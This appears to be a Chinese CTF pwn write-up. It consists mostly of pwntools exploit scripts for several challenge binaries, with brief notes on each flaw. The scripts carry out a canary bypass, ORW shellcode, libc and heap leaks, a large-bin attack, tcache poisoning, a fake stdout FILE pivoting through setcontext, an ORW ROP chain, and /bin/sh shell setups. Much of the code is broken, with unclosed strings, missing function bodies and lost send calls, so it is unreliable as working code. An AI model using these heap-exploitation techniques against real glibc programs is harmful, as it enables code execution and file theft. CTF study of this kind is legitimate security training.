队友分析出来可以绕过 canary, 劫持返回地址到 attack。
# imLZH1
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
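# Thin aliases over the pwntools tube `io`, which is assigned further down
# (io = start(...)). Each lambda looks `io` up at call time, so none of them
# may be used before that assignment runs.
s = lambda x: io.send(x)
sa = lambda x, y: io.sendafter(x, y)
sl = lambda x: io.sendline(x)
sla = lambda x, y: io.sendlineafter(x, y)
r = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rl = lambda: io.recvline()
itr = lambda: io.interactive()
# Unpack a short little-endian leak, right-padding with NULs to the word size.
# The fill must be a single byte: the rendered listing had lost the backslash
# (b'x00' is three bytes and makes ljust() raise TypeError), restored here.
uu32 = lambda x: u32(x.ljust(4, b'\x00'))
uu64 = lambda x: u64(x.ljust(8, b'\x00'))
ls = lambda x: log.success(x)
# Debug printer: lss('libc_base') logs that global in red. It evaluates its
# argument with eval(), so pass only literal variable names written in this
# script -- never a string derived from the target's output.
lss = lambda x: ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))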
attack = ''
binary = './ASU1'
def start(argv=[], *a, **kw):
    """Spawn the target the way the command line asks for.

    GDB=1 runs the binary under gdb with ``gdbscript``; TAG=host:port connects
    to that address; REM=1 connects to ``attack`` (which must be set to a
    "host:port" string first -- it is empty by default, and ''.split(':')
    gives remote() a bogus host); otherwise the binary is started locally with
    ``argv`` appended. ``argv`` is never mutated, so the list default is safe.
    """
    if args.GDB:
        tube = gdb.debug(binary, gdbscript)
    elif args.TAG:
        tube = remote(*args.TAG.split(':'))
    elif args.REM:
        tube = remote(*attack.split(':'))
    else:
        tube = process([binary] + argv, *a, **kw)
    return tube
# Make pwntools treat ./ASU1 as the target binary, log every byte sent and
# received (debug level), and open gdb in a tmux side pane of width 170.
context.update(
    binary=binary,
    log_level='debug',
    terminal=['tmux', 'splitw', '-h', '-l', '170'],
)
# The libc pwntools resolves for that binary; replace with ELF('./libc.so.6')
# (see the commented lines below) when the remote libc differs from the local one.
libc = context.binary.libc
#elf = ELF(binary)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '', 10808)
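# gdb commands run by gdb.debug() when the script is started with GDB=1.
# Nothing is set for this target; the closing quotes had been lost in the
# rendered listing, leaving the string literal unterminated.
gdbscript = '''
'''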
#io = rmote()
# The tube every alias above talks to (start() picks local/gdb/remote).
io = start()
def cmd(a):
    """Answer the menu prompt (": ") with choice *a*, stringified."""
    choice = str(a)
    sla(b': ', choice)
def case1(id, name, con):
    """Drive the 'add' dialogue: id after 'ID: ', then name and contents after
    the next two ': ' prompts. Everything goes through sendafter (no newline
    appended), so callers supply any terminator the target expects.
    (The parameter name ``id`` shadows the builtin; kept for callers.)"""
    for prompt, value in ((b'ID: ', id), (b': ', name), (b': ', con)):
        sa(prompt, value)
def detele(id):
    """Delete entry *id*: sendlineafter the 'ID: ' prompt.
    The misspelt name is the one callers use, so it stays."""
    prompt = b'ID: '
    sla(prompt, id)
def addfile(name,con):
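# Two 8/9-byte stubs: nop sled, `mov edi, eax` (fd returned by open),
# `push rsp; pop rsi` (buffer = stack), `syscall`. The bytes must be sent as
# bytes -- the listing had lost both the backslashes and, on the first call,
# the b prefix; as a str, '\x90' would be UTF-8 encoded to two bytes.
addfile(b'flag3', b'\x90\x90\x89\xc7\x54\x5e\x0f\x05')      # 8
addfile(b'flag7', b'\x90\x90\x90\x89\xc7\x54\x5e\x0f\x05')  # 9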
xxx = '''
mov edi,eax
push rsp
pop rsi
# Fixed address inside the target (0x40xxxx looks like a non-PIE text address);
# only used by the commented gdb.attach() breakpoint below, not by the payload.
gadget = 0x04028A6
#gdb.attach(io,f'b *{gadget}')
sc1 = asm(sc1)
ru('want to do?')
# ORW shellcode: open("flag") leaves the fd in rax, which read() takes as its
# first argument; the contents land on the stack (rsp) and are echoed to
# stdout. The 0x40-byte window truncates a longer flag. Each stage is
# assembled separately and the machine code concatenated.
stages = (
    shellcraft.open('flag'),
    shellcraft.read('rax', 'rsp', 0x40),
    shellcraft.write(1, 'rsp', 0x40),
)
sc = b''.join(asm(stage) for stage in stages)
#pay = flat({
这里会heap++ 指针
如果紧接着调用的话,这里的 heap 指针也是++ 后的,基地址发生偏移,从而堆溢出。
后面 large_bin_attack 攻击mp_
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
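# Thin aliases over the pwntools tube `io`, which is assigned further down
# (io = start(...)). Each lambda looks `io` up at call time, so none of them
# may be used before that assignment runs.
s = lambda x: io.send(x)
sa = lambda x, y: io.sendafter(x, y)
sl = lambda x: io.sendline(x)
sla = lambda x, y: io.sendlineafter(x, y)
r = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rl = lambda: io.recvline()
itr = lambda: io.interactive()
# Unpack a short little-endian leak, right-padding with NULs to the word size.
# The fill must be a single byte: the rendered listing had lost the backslash
# (b'x00' is three bytes and makes ljust() raise TypeError), restored here.
uu32 = lambda x: u32(x.ljust(4, b'\x00'))
uu64 = lambda x: u64(x.ljust(8, b'\x00'))
ls = lambda x: log.success(x)
# Debug printer: lss('libc_base') logs that global in red. It evaluates its
# argument with eval(), so pass only literal variable names written in this
# script -- never a string derived from the target's output.
lss = lambda x: ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))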
attack = ''
binary = './SU_text'
def start(argv=[], *a, **kw):
    """Spawn the target the way the command line asks for.

    GDB=1 runs the binary under gdb with ``gdbscript``; TAG=host:port connects
    to that address; REM=1 connects to ``attack`` (which must be set to a
    "host:port" string first -- it is empty by default); otherwise the binary
    is started locally with ``argv`` appended. ``argv`` is never mutated.
    """
    if args.GDB:
        tube = gdb.debug(binary, gdbscript)
    elif args.TAG:
        tube = remote(*args.TAG.split(':'))
    elif args.REM:
        tube = remote(*attack.split(':'))
    else:
        tube = process([binary] + argv, *a, **kw)
    return tube
# Make pwntools treat ./SU_text as the target binary, log every byte sent and
# received, and open gdb in a tmux side pane.
context.update(
    binary=binary,
    log_level='debug',
    terminal=['tmux', 'splitw', '-h', '-l', '170'],
)
# The libc pwntools resolves for that binary; libc.address is set once the
# leak below has been taken.
libc = context.binary.libc
#elf = ELF(binary)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '', 10808)
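# gdb commands for GDB=1 runs; the printf breakpoint is kept but commented out.
# The closing quotes had been lost in the rendered listing.
gdbscript = '''
#b *printf
'''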
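def add(idx, size):
    """Encode the "allocate" command: p8(1) p8(0x10) p8(idx) p32(size) p8(3).

    The trailing 3 is the end-of-command marker shared by every builder here,
    which is why the main flow slices packets with [:-1]/[:-2] to chain them.
    The original built the packet and dropped it; it is now returned like the
    sibling builders. NOTE(review): the add(...) calls below ignore the result,
    so a send (inside add() or at the call site) was lost from the listing.
    """
    return p8(1) + p8(0x10) + p8(idx) + p32(size) + p8(3)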
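def rm(idx):
    """Encode the "free" command: p8(1) p8(0x11) p8(idx) p8(3).

    Returned rather than dropped so callers can send it (the original built
    it and discarded it; see the note on add()).
    """
    return p8(1) + p8(0x11) + p8(idx) + p8(3)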
def write(idx, offset):
    """Encode the "print from slot" command (type 2, ops 0x10/0x16).

    ``offset`` goes out as a raw 32-bit value; the main flow passes
    0xffffffe7+8, i.e. a value the target presumably interprets as a negative
    index, so this is the out-of-bounds read used for the leaks.
    """
    header = p8(2) + p8(idx) + p8(0x10) + p8(0x16)
    trailer = p8(0) + p8(3)
    return header + p32(offset) + trailer
def heap_to_buf(offset):
    """Encode "copy slot 0[offset] into the scratch buffer" (ops 0x10/0x15).

    The 8-byte operand after the offset is always zero here; the slot byte is
    fixed at 0.
    """
    header = p8(2) + p8(0) + p8(0x10) + p8(0x15)
    operands = p32(offset) + p64(0)  # buf
    return header + operands + p8(0) + p8(3)
def buf_to_heap(idx, offset, data):
    """Encode "store the 64-bit ``data`` at slot idx[offset]" (ops 0x10/0x14).

    This is the primitive used to plant the large-bin target, the mangled
    tcache pointer and the fake FILE, 8 bytes per command.
    """
    header = p8(2) + p8(idx) + p8(0x10) + p8(0x14)
    operands = p32(offset) + p64(data)  # buf
    return header + operands + p8(0) + p8(3)
def heap_add(idx, data1, data2):
    """Encode the 32-bit "add" op on slot idx (ops 0x10/0x10).

    Both operands are truncated to 32 bits before packing so that p32()
    never raises on a full 64-bit address.
    """
    lo1 = data1 & 0xFFFFFFFF
    lo2 = data2 & 0xFFFFFFFF
    header = p8(2) + p8(idx) + p8(0x10) + p8(0x10)
    return header + p32(lo1) + p32(lo2) + p8(0) + p8(3)
# game 2 vuln
def s2_xor(idx, data1, data2):
    """Encode the "game 2" xor op on slot idx (ops 0x11/0x12).

    Per the writeup note above, this op bumps the slot's heap pointer as a
    side effect; the main flow repeats it 20 times on one slot to shift the
    base and turn later writes into an overflow. Operands are truncated to
    32 bits like heap_add().
    """
    lo1 = data1 & 0xFFFFFFFF
    lo2 = data2 & 0xFFFFFFFF
    header = p8(2) + p8(idx) + p8(0x11) + p8(0x12)
    return header + p32(lo1) + p32(lo2) + p8(0) + p8(3)
#io = rmote()
# The tube every alias above talks to (start() picks local/gdb/remote).
io = start()
#pay = flat({
# --- heap grooming: three 0x418 chunks, slot 0 allocated twice ---
add(0, 0x418)
add(1, 0x418)
add(0, 0x418)
# --- libc leak ---
# heap_to_buf(0)[:-1] drops its end marker so write() can be chained behind
# it. 0xffffffe7+8 is 0xffffffef, i.e. -17 if the target reads the offset as a
# signed 32-bit value: presumably an unchecked negative index that reaches a
# libc pointer in front of the chunk. 0x203b20 is that pointer's distance from
# libc base for this particular libc build.
# NOTE(review): nothing between building `pay` and r(8) sends it -- the send
# call appears to have been lost from the listing.
pay = heap_to_buf(0)[:-1]
pay += write(0,0xffffffe7+8)
libc_base = uu64(r(8)) - 0x203b20
#pay = buf_to_heap(0, 0, libc_base & 0xFFFFFFFF00000000)
# Both lines below overwrite `pay` without a surviving send; as written only
# the second assignment has any effect.
pay = buf_to_heap(0, 0, 0)
pay = buf_to_heap(0, 8, 0)
#pay = heap_add(0, 0, libc_base + 0x2031ec)
# padding chunks so later allocations land where the attack expects
add(3,0x428) # pad
add(5,0x428) # pad
add(6,0x438) # pad
#gdb.attach(io,gdbscript='brva 0x001752')
# large-bin-attack target (libc+0x2031ec; the note above says this is mp_).
# The -0x20 presumably lines the bk_nextsize write up with the field to
# overwrite -- confirm against the libc layout.
target = libc_base + 0x2031ec - 0x20
# One command stream: 20 s2_xor ops on slot 1 (shifts its heap pointer, see
# s2_xor), plant `target` at slot 0 +0x3e8, pull 0x3e0 back into the buffer
# and read at the wrapped offset again, this time leaking a heap address.
# The [:-2]/[2:-2]/[2:] slices strip per-command headers/markers so the pieces
# concatenate into a single stream. Same lost-send caveat before r(8).
pay = s2_xor(1, 1, 2)[:-2]
pay += s2_xor(1, 1, 2)[2:-2] * 19
pay += buf_to_heap(0,0x3e8,target)[2:-2]
pay += heap_to_buf(0x3e0)[2:-2]
pay += write(0,0xffffffe7+8+3)[2:]
heap_base = uu64(r(8))
libc.address = libc_base
heap_base += 0x2000
# Safe-linking key: glibc >= 2.32 stores tcache/fastbin next pointers as
# ptr ^ (slot_address >> 12), so the poisoned pointer below must be mangled
# with the key of the chunk it is written into (presumably heap_base+0x2000).
key = heap_base >> 0xC
# Presumably tcache poisoning: slot 7's next pointer (at 0x3f0) is redirected
# to _IO_2_1_stdout_, so a later allocation hands back the FILE struct.
pay = s2_xor(7, 1, 2)[:-2]
pay += s2_xor(7, 1, 2)[2:-2] * 19
pay += buf_to_heap(7,0x3f0, libc.sym['_IO_2_1_stdout_'] ^ key)[2:]
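fake_IO_addr = libc.sym['_IO_2_1_stdout_']
# Fake FILE that will be written over _IO_2_1_stdout_. Its vtable slot (0xd8)
# is pointed into _IO_wfile_jumps with an offset, so the next stdout flush
# dispatches through a wide-char handler (the commented breakpoint on
# _IO_switch_to_wget_mode below is where to watch it) and ends up calling
# setcontext+61 with this struct as the register image: 0x68/0x70/0x88 are
# rdi/rsi/rdx per the inline comments, 0xa0/0xa8 presumably rsp/rip -- confirm
# against setcontext. Net effect: read(fd, fake_IO_addr, size) overwrites the
# struct itself with the ROP chain built below.
# The closing `}, filler=b'\x00')` had been lost in the listing; restored from
# the commented template directly above.
fake_io = flat({
    0x00: ' sh;',
    0x18: libc.sym['setcontext'] + 61,
    0x20: fake_IO_addr,          # 0x20 > 0x18
    0x68: fake_IO_addr,          # rdi  (read fd)
    0x70: 0,                     # rsi  (read buf)
    0x78: fake_IO_addr,          # rsi2 (read buf)
    0x88: fake_IO_addr + 0x8,    # rdx  (read size)
    0x90: 0x400,                 # rdx2 (read size)
    0x98: 0x23,                  # rdx  (read size)
    0xa0: fake_IO_addr,
    0xa8: libc.sym['setcontext'] + 294,  # RCE2 ogg
    0xb0: libc.sym['read'],              # RCE2 ogg
    0xd8: libc.sym['_IO_wfile_jumps'] + 0x30 - 0x20,
    0xe0: fake_IO_addr,
}, filler=b'\x00')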
# Write the fake FILE into slot 9 one qword at a time. The first command keeps
# its header (and loses its end marker), the middle ones are stripped on both
# sides, and a single end marker is appended after the loop. fake_io is a
# multiple of 8 bytes (last key 0xe0 + 8), so every slice is a full qword.
pay = buf_to_heap(9, 0, 0)[:-2]
for off in range(0, len(fake_io), 8):
    word = u64(fake_io[off:off + 8])
    pay += buf_to_heap(9, off, word)[2:-2]
pay += buf_to_heap(9, off, word)[-2:]
#gdb.attach(io,gdbscript='b * _IO_switch_to_wget_mode')
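# ORW ROP chain laid out at fake_IO_addr (the fake FILE doubles as the stack
# once setcontext pivots there).
libc_rop = ROP(libc)
rax = libc_rop.find_gadget(['pop rax', 'ret'])[0]
rdi = libc_rop.find_gadget(['pop rdi', 'ret'])[0]
rsi = libc_rop.find_gadget(['pop rsi', 'ret'])[0]
# No usable `pop rdx; ret` was found, so rdx is loaded through r13. Both
# offsets are specific to the target's libc build and must be re-found for
# any other libc.
r13 = libc_base + 0x000584c9  # pop r13 ; ret
rdx = libc_base + 0x00000000000b00c7  # mov rdx, r13 ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret
syscall = libc_rop.find_gadget(['syscall', 'ret'])[0]
orw_rop_addr = fake_IO_addr
# The path string sits right after the chain: 0xd0+0x28 = 0xf8, which is the
# chain's exact length (7 + 12 + 12 qwords). The same buffer is reused for
# read()/write() once open() has consumed the path.
path_addr = orw_rop_addr + 0xd0 + 0x28
# open(path, O_RDONLY) via raw syscall 2
orw_rop = p64(rax) + p64(2) + p64(rdi) + p64(path_addr) + p64(rsi) + p64(0) + p64(syscall)
# read(3, buf, 0x100): fd 3 is assumed to be the first free descriptor; adjust
# if the target keeps other files open. The four zeros feed the pops that
# follow `mov rdx, r13`. 0x100 bytes caps the flag length.
orw_rop += p64(rdi) + p64(3) + p64(rsi) + p64(path_addr) + p64(r13) + p64(0x100) + p64(rdx) + p64(0) * 4 + p64(libc.sym['read'])
# write(1, buf, 0x100)
orw_rop += p64(rdi) + p64(1) + p64(rsi) + p64(path_addr) + p64(r13) + p64(0x100) + p64(rdx) + p64(0) * 4 + p64(libc.sym['write'])
# NUL-padded path; the listing's pad had lost its backslash (ljust needs a
# single-byte fill), restored here.
orw_rop += b'/flag'.ljust(0x10, b'\x00')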
#pay = write(0, 0x10+0x1728)
漏洞点在 create_data：先赋值 data_size，然后才做判断，于是就有了堆溢出的操作。
构造 data_ptr 可以先溢出到 text_ptr
然后稍微爆破的方式把 fd 3,修改成0,
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
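# Thin aliases over the pwntools tube `io`, which is assigned further down
# (io = start(...)). Each lambda looks `io` up at call time, so none of them
# may be used before that assignment runs.
s = lambda x: io.send(x)
sa = lambda x, y: io.sendafter(x, y)
sl = lambda x: io.sendline(x)
sla = lambda x, y: io.sendlineafter(x, y)
r = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rl = lambda: io.recvline()
itr = lambda: io.interactive()
# Unpack a short little-endian leak, right-padding with NULs to the word size.
# The fill must be a single byte: the rendered listing had lost the backslash
# (b'x00' is three bytes and makes ljust() raise TypeError), restored here.
uu32 = lambda x: u32(x.ljust(4, b'\x00'))
uu64 = lambda x: u64(x.ljust(8, b'\x00'))
ls = lambda x: log.success(x)
# Debug printer: lss('libc_base') logs that global in red. It evaluates its
# argument with eval(), so pass only literal variable names written in this
# script -- never a string derived from the target's output.
lss = lambda x: ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))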
attack = ''
#attack = ''
binary = './chall'
def start(argv=[], *a, **kw):
    """Spawn the target the way the command line asks for.

    GDB=1 runs the binary under gdb with ``gdbscript``; TAG=host:port connects
    to that address; REM=1 connects to ``attack`` (which must be set to a
    "host:port" string first -- it is empty by default); otherwise the binary
    is started locally with ``argv`` appended. ``argv`` is never mutated.
    """
    if args.GDB:
        tube = gdb.debug(binary, gdbscript)
    elif args.TAG:
        tube = remote(*args.TAG.split(':'))
    elif args.REM:
        tube = remote(*attack.split(':'))
    else:
        tube = process([binary] + argv, *a, **kw)
    return tube
# Make pwntools treat ./chall as the target binary, log every byte sent and
# received, and open gdb in a tmux side pane.
context.update(
    binary=binary,
    log_level='debug',
    terminal=['tmux', 'splitw', '-h', '-l', '170'],
)
# The libc pwntools resolves for that binary.
libc = context.binary.libc
#elf = ELF(binary)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '', 10808)
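# gdb commands for GDB=1 runs: one live breakpoint at 0x401299, the rest kept
# commented for quick toggling. The closing quotes had been lost in the
# rendered listing, leaving the literal unterminated.
gdbscript = '''
b *0x00401299
#b *0x401F90
#b *0x401FC0
#b *0x401FF0
#b *0x402030
#b *0x402070
#b *0x4020B0
#b *0x4020F0
#b *0x402130
'''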
#io = rmote()
# The tube every alias above talks to (start() picks local/gdb/remote).
io = start()
def menu(i):
ru('choice >n')
# 1 byte
# 2 text
def add(Type):
def rm(Type):
def create_data(size):
ru(b'Please input the size of the data ocean.n')
def pull_data(size,Type):
ru(b'How much data?n')
ru('2.gate of textn')
ru(b'bytes from the gate:n')
# heap
### 为了调整 堆布局
# edit 0
while 1:
pull_data(0x3a1, 1)
data = ru('**GATES OF DATA**')
x = int(data[:-19][-2:],16)
if x == 0: # edit fd == 0
#pull_data(0x3a1, 1)
ru(b'How much data?n')
ru('2.gate of textn')
pay = '0n' * 0x388
pay = p64(0x3a0)
pay += p64(0x480678)
pay += p64(0x3a0)
pay += p64(0xd7b100000000)
pay += p64(0x1000) # edit size
x = 'n'.join([str(i) for i in list(pay)])
#pay = '0n' * 0x3a0
#pay += 'n'.join([str(i) for i in p64(0xd7b100000000)])
ru(b'How much data?n')
ru('2.gate of textn')
pay = b'1nx00'
pay = pay.ljust(0x118+4,b'A')
pay += p64(0)
pay += p64(0)
pay += p64(0xd7b300000000)
pay += p64(0x1)
#pay += p64(0xd7b200000000)
#pay += p64(0x100)
#pay += p64(0)
#pay += p64(0)
#pay += p64(0)
#pay += p64(0x111111)
#pay += p64(0x41c710)
#pay += p64(0x41c6b0)
#pay += p64(0x41c6b0)
#pay += p64(0x41c660)
# write /bin/sh
ru(b'How much data?n')
ru('2.gate of textn')
pay = flat({
# read
pay += p64(0xd7b100000000)
pay += p64(0x1000)
pay += p64(0)
pay += p64(1)
pay += p64(0)
#pay += p64(0x47e9d0-2)
pay += p64(0x47f920-2) # ptr base
pay += p64(0x41c710)
pay += p64(0x41c680)
pay += p64(0)
pay += p64(0x41c660)
pay += p64(0)
ru(b'How much data?n')
ru('2.gate of textn')
pay = b'/bin/shx00' # /bin/sh -c '/bin/sh'
sl(b'1x00' + pay)
# set offset ,send pay
ru(b'How much data?n')
ru('2.gate of textn')
pay = flat({
pay += p64(0xd7b100000000)
pay += p64(0x1000)
pay += p64(0)
pay += p64(1)
pay += p64(1)
pay += p64(0x47e9a8) # ooo
pay += p64(0x41c710)
pay += p64(0x41c680)
pay += p64(0x424242)
pay += p64(0x41c660)
pay += p64(0x434343)
ru(b'How much data?n')
ru('2.gate of textn')
#gdb.attach(io,'b * 0x41ce1b')
pay = flat({
print('b *0x0456184')
#ru(b'How much data?n')
#ru('2.gate of textn')
#pay = flat({
# 0x398:0
#pay += p64(0xd7b100000000)
#pay += p64(0x1000)
#pay += p64(0)
#pay += p64(1)
#pay += p64(0)
#pay += p64(0x47e9d0-2)
##pay += p64(0x47f920)
#pay += p64(0x41c710)
#pay += p64(0x41c680)
#pay += p64(0)
#pay += p64(0x41c660)
#pay += p64(0)
#for i range()k
#ru(b'How much data?n')
#ru('2.gate of textn')
#pay = flat({
# #0x00:';sh;xb2xd7',
# 0x00:0xd7b200000001,
# 0x08:0x100,
# 0x10:0x0,
# 0x18:0x0,
# 0x20:0x0,
# 0x28:0x414243,
# #0x3:0
#pull_data(0x2a0, 1)
#pull_data(0x200, 2)
把文件patch 一下 然后直接爆出来
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
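# Thin aliases over the pwntools tube `io`, which is assigned further down
# (io = start(...)). Each lambda looks `io` up at call time, so none of them
# may be used before that assignment runs.
s = lambda x: io.send(x)
sa = lambda x, y: io.sendafter(x, y)
sl = lambda x: io.sendline(x)
sla = lambda x, y: io.sendlineafter(x, y)
r = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rl = lambda: io.recvline()
itr = lambda: io.interactive()
# Unpack a short little-endian leak, right-padding with NULs to the word size.
# The fill must be a single byte: the rendered listing had lost the backslash
# (b'x00' is three bytes and makes ljust() raise TypeError), restored here.
uu32 = lambda x: u32(x.ljust(4, b'\x00'))
uu64 = lambda x: u64(x.ljust(8, b'\x00'))
ls = lambda x: log.success(x)
# Debug printer: lss('libc_base') logs that global in red. It evaluates its
# argument with eval(), so pass only literal variable names written in this
# script -- never a string derived from the target's output.
lss = lambda x: ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))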
attack = ''
binary = './chall'
def start(argv=[], *a, **kw):
    """Spawn the target the way the command line asks for.

    GDB=1 runs the binary under gdb with ``gdbscript``; TAG=host:port connects
    to that address; REM=1 connects to ``attack`` (which must be set to a
    "host:port" string first -- it is empty by default); otherwise the binary
    is started locally with ``argv`` appended. ``argv`` is never mutated.
    """
    if args.GDB:
        tube = gdb.debug(binary, gdbscript)
    elif args.TAG:
        tube = remote(*args.TAG.split(':'))
    elif args.REM:
        tube = remote(*attack.split(':'))
    else:
        tube = process([binary] + argv, *a, **kw)
    return tube
#context(binary = binary, log_level = 'info',
# Make pwntools treat ./chall as the target binary, log every byte sent and
# received (the brute-force loop below spawns 256 targets, so switch to the
# commented 'info' level above when the debug output gets in the way), and
# open gdb in a tmux side pane.
context.update(
    binary=binary,
    log_level='debug',
    terminal=['tmux', 'splitw', '-h', '-l', '170'],
)
# The libc pwntools resolves for that binary.
libc = context.binary.libc
#elf = ELF(binary)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '', 10808)
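# gdb commands for GDB=1 runs; `brva` is the pwndbg "break at RVA" command,
# so these are offsets into the (PIE) binary. The closing quotes had been lost
# in the rendered listing.
gdbscript = '''
brva 0x02349
brva 0x0274D
'''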
#io = rmote()
#pay = flat({
### 0
# hack gsp(0, 1, 0, 0, 0x1111) 0: 66 b8 11 11 mov ax, 0x1111
# hack gsp(0, 1, 1, 0, 0x1111) 0: 66 bb 11 11 mov bx, 0x1111
# hack gsp(0, 1, 2, 0, 0x1111) 0: 66 b9 11 11 mov cx, 0x1111
# hack gsp(0, 1, 3, 0, 0x1111) 0: 66 ba 11 11 mov dx, 0x1111
# hack gsp(0, 0, 0, 0, 0x1111) 0: 66 89 c0 mov ax, ax
# hack gsp(0, 0, 0, 1, 0x1111) 0: 66 89 d8 mov ax, bx
# hack gsp(0, 0, 0, 2, 0x1111) 0: 66 89 c8 mov ax, cx
# hack gsp(0, 0, 0, 3, 0x1111) 0: 66 89 d0 mov ax, dx
# hack gsp(0, 0, 1, 0, 0x1111) 0: 66 89 c3 mov bx, ax
# hack gsp(0, 0, 1, 1, 0x1111) 0: 66 89 db mov bx, bx
# hack gsp(0, 0, 1, 2, 0x1111) 0: 66 89 cb mov bx, cx
# hack gsp(0, 0, 1, 3, 0x1111) 0: 66 89 d3 mov bx, dx
# hack gsp(0, 0, 2, 0, 0x1111) 0: 66 89 c1 mov cx, ax
# hack gsp(0, 0, 2, 1, 0x1111) 0: 66 89 d9 mov cx, bx
# hack gsp(0, 0, 2, 2, 0x1111) 0: 66 89 c9 mov cx, cx
# hack gsp(0, 0, 2, 3, 0x1111) 0: 66 89 d1 mov cx, dx
# hack gsp(0, 0, 3, 0, 0x1111) 0: 66 89 c2 mov dx, ax
# hack gsp(0, 0, 3, 1, 0x1111) 0: 66 89 da mov dx, bx
# hack gsp(0, 0, 3, 2, 0x1111) 0: 66 89 ca mov dx, cx
# hack gsp(0, 0, 3, 3, 0x1111) 0: 66 89 d2 mov dx, dx
### 1
# hack gsp(1, 1, 0, 0, 0x1111) 0: 66 11 c0 adc ax, ax
# hack gsp(1, 1, 0, 1, 0x1111) 0: 66 11 d8 adc ax, bx
# hack gsp(1, 1, 0, 2, 0x1111) 0: 66 11 c8 adc ax, cx
# hack gsp(1, 1, 0, 3, 0x1111) 0: 66 11 d0 adc ax, dx
# hack gsp(1, 1, 1, 0, 0x1111) 0: 66 11 c3 adc bx, ax
# hack gsp(1, 1, 1, 1, 0x1111) 0: 66 11 db adc bx, bx
# hack gsp(1, 1, 1, 2, 0x1111) 0: 66 11 cb adc bx, cx
# hack gsp(1, 1, 1, 3, 0x1111) 0: 66 11 d3 adc bx, dx
# hack gsp(1, 1, 2, 0, 0x1111) 0: 66 11 c1 adc cx, ax
# hack gsp(1, 1, 2, 1, 0x1111) 0: 66 11 d9 adc cx, bx
# hack gsp(1, 1, 2, 2, 0x1111) 0: 66 11 c9 adc cx, cx
# hack gsp(1, 1, 2, 3, 0x1111) 0: 66 11 d1 adc cx, dx
# hack gsp(1, 1, 3, 0, 0x1111) 0: 66 11 c2 adc dx, ax
# hack gsp(1, 1, 3, 1, 0x1111) 0: 66 11 da adc dx, bx
# hack gsp(1, 1, 3, 2, 0x1111) 0: 66 11 ca adc dx, cx
# hack gsp(1, 1, 3, 3, 0x1111) 0: 66 11 d2 adc dx, dx
# hack gsp(1, 0, 0, 0, 0x1111) 0: 66 01 c0 add ax, ax
# hack gsp(1, 0, 0, 1, 0x1111) 0: 66 01 d8 add ax, bx
# hack gsp(1, 0, 0, 2, 0x1111) 0: 66 01 c8 add ax, cx
# hack gsp(1, 0, 0, 3, 0x1111) 0: 66 01 d0 add ax, dx
# hack gsp(1, 0, 1, 0, 0x1111) 0: 66 01 c3 add bx, ax
# hack gsp(1, 0, 1, 1, 0x1111) 0: 66 01 db add bx, bx
# hack gsp(1, 0, 1, 2, 0x1111) 0: 66 01 cb add bx, cx
# hack gsp(1, 0, 1, 3, 0x1111) 0: 66 01 d3 add bx, dx
# hack gsp(1, 0, 2, 0, 0x1111) 0: 66 01 c1 add cx, ax
# hack gsp(1, 0, 2, 1, 0x1111) 0: 66 01 d9 add cx, bx
# hack gsp(1, 0, 2, 2, 0x1111) 0: 66 01 c9 add cx, cx
# hack gsp(1, 0, 2, 3, 0x1111) 0: 66 01 d1 add cx, dx
# hack gsp(1, 0, 3, 0, 0x1111) 0: 66 01 c2 add dx, ax
# hack gsp(1, 0, 3, 1, 0x1111) 0: 66 01 da add dx, bx
# hack gsp(1, 0, 3, 2, 0x1111) 0: 66 01 ca add dx, cx
# hack gsp(1, 0, 3, 3, 0x1111) 0: 66 01 d2 add dx, dx
### 2
# hack gsp(2, 0, 0, 0, 0x1111) 0: 66 29 c0 sub ax, ax
# hack gsp(2, 0, 0, 1, 0x1111) 0: 66 29 d8 sub ax, bx
# hack gsp(2, 0, 0, 2, 0x1111) 0: 66 29 c8 sub ax, cx
# hack gsp(2, 0, 0, 3, 0x1111) 0: 66 29 d0 sub ax, dx
# hack gsp(2, 0, 1, 0, 0x1111) 0: 66 29 c3 sub bx, ax
# hack gsp(2, 0, 1, 1, 0x1111) 0: 66 29 db sub bx, bx
# hack gsp(2, 0, 1, 2, 0x1111) 0: 66 29 cb sub bx, cx
# hack gsp(2, 0, 1, 3, 0x1111) 0: 66 29 d3 sub bx, dx
# hack gsp(2, 0, 2, 0, 0x1111) 0: 66 29 c1 sub cx, ax
# hack gsp(2, 0, 2, 1, 0x1111) 0: 66 29 d9 sub cx, bx
# hack gsp(2, 0, 2, 2, 0x1111) 0: 66 29 c9 sub cx, cx
# hack gsp(2, 0, 2, 3, 0x1111) 0: 66 29 d1 sub cx, dx
# hack gsp(2, 0, 3, 0, 0x1111) 0: 66 29 c2 sub dx, ax
# hack gsp(2, 0, 3, 1, 0x1111) 0: 66 29 da sub dx, bx
# hack gsp(2, 0, 3, 2, 0x1111) 0: 66 29 ca sub dx, cx
# hack gsp(2, 0, 3, 3, 0x1111) 0: 66 29 d2 sub dx, dx
# hack gsp(2, 1, 0, 0, 0x1111) 0: 66 19 c0 sbb ax, ax
# hack gsp(2, 1, 0, 1, 0x1111) 0: 66 19 d8 sbb ax, bx
# hack gsp(2, 1, 0, 2, 0x1111) 0: 66 19 c8 sbb ax, cx
# hack gsp(2, 1, 0, 3, 0x1111) 0: 66 19 d0 sbb ax, dx
# hack gsp(2, 1, 1, 0, 0x1111) 0: 66 19 c3 sbb bx, ax
# hack gsp(2, 1, 1, 1, 0x1111) 0: 66 19 db sbb bx, bx
# hack gsp(2, 1, 1, 2, 0x1111) 0: 66 19 cb sbb bx, cx
